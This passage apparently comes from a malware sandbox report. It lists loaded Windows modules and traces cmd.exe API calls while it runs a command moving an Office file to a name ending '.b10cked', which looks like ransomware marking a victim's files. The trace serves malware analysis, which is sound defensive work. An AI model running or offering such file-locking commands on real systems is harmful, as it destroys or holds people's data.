23377 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23378 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23379 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23380 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23381 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23382 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23383 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 23384 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23385 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23386 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23387 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23388 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23389 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 23390 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 23391 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000005c0000" filename = "" Region: id = 23392 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 363 os_tid = 0x9e0 [0172.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe84 | out: lpSystemTimeAsFileTime=0x2afe84*(dwLowDateTime=0x9c7a6280, dwHighDateTime=0x1d440a9)) [0172.100] GetCurrentProcessId () returned 0x848 [0172.100] GetCurrentThreadId () returned 0x9e0 [0172.100] GetTickCount () returned 0x322bc [0172.100] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe7c | out: lpPerformanceCount=0x2afe7c*=22888912512) returned 1 [0172.101] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.101] __set_app_type (_Type=0x1) [0172.101] __p__fmode () returned 0x76b331f4 [0172.101] __p__commode () returned 0x76b331fc [0172.101] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.101] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.101] GetCurrentThreadId () returned 0x9e0 [0172.101] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9e0) returned 0x38 [0172.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.101] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.101] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.102] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.102] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afe14 | out: phkResult=0x2afe14*=0x0) returned 0x2 [0172.102] VirtualQuery (in: lpAddress=0x2afe4b, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2af000, 
AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.102] GetConsoleOutputCP () returned 0x1b5 [0172.102] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.102] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.102] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.103] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.103] _get_osfhandle (_FileHandle=0) returned 0x3 
[0172.103] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.103] GetEnvironmentStringsW () returned 0x80210* [0172.103] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0172.104] GetEnvironmentStringsW () returned 0x80210* [0172.104] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0172.104] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0xa0, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegCloseKey (hKey=0x40) returned 0x0 [0172.104] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.105] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.105] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, 
lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.105] RegCloseKey (hKey=0x40) returned 0x0 [0172.105] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886387 [0172.105] srand (_Seed=0x5b886387) [0172.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"" [0172.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"" [0172.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.105] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.105] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.106] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.106] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.106] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.106] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.106] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.106] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.106] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.106] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.106] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.106] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.106] GetEnvironmentStringsW () returned 0x82360* [0172.106] FreeEnvironmentStringsW (penv=0x82360) returned 1 [0172.106] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.106] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.106] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.106] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.106] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.106] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.106] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.106] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.106] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.106] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afb50, lpFilePart=0x2afb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afb4c*="Desktop") returned 0x18 [0172.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.107] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0x809f0 [0172.107] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0172.107] FindFirstFileW 
(in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0x809f0 [0172.107] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0172.107] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0x809f0 [0172.107] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0172.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.107] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.107] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.108] GetEnvironmentStringsW () returned 0x80210* [0172.108] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0172.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.108] GetConsoleOutputCP () returned 0x1b5 [0172.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.108] GetUserDefaultLCID () returned 0x409 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afc90, cchData=128 | out: lpLCData="1") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.109] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.110] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.111] GetConsoleTitleW (in: lpConsoleTitle=0x70930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.111] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.111] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.111] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.112] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.112] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.112] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.112] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.112] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.112] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.112] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0172.116] GetConsoleTitleW (in: lpConsoleTitle=0x2af988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.414] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.414] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.414] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.414] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.414] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.414] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.414] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.414] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.415] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.415] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.415] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.415] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.415] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.415] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.415] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.415] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.415] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.415] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.415] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.415] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.415] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.415] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0172.415] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.415] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.415] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.415] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.415] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.417] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af744, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af73c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af73c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.418] _wcsnicmp (_String1="COPYCMD", 
_String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.419] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0172.419] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0172.419] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0172.419] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwv~1.trx")) returned 0x2020 [0172.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.635] SetErrorMode (uMode=0x0) returned 0x0 [0172.635] SetErrorMode (uMode=0x1) returned 0x0 [0172.635] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2af0cc, lpFilePart=0x2af0b4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", lpFilePart=0x2af0b4*="OUTLWV~1.TRX") returned 0x3c [0172.635] SetErrorMode (uMode=0x0) returned 0x1 [0172.635] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.635] _wcsicmp (_String1="OUTLWV~1.TRX", 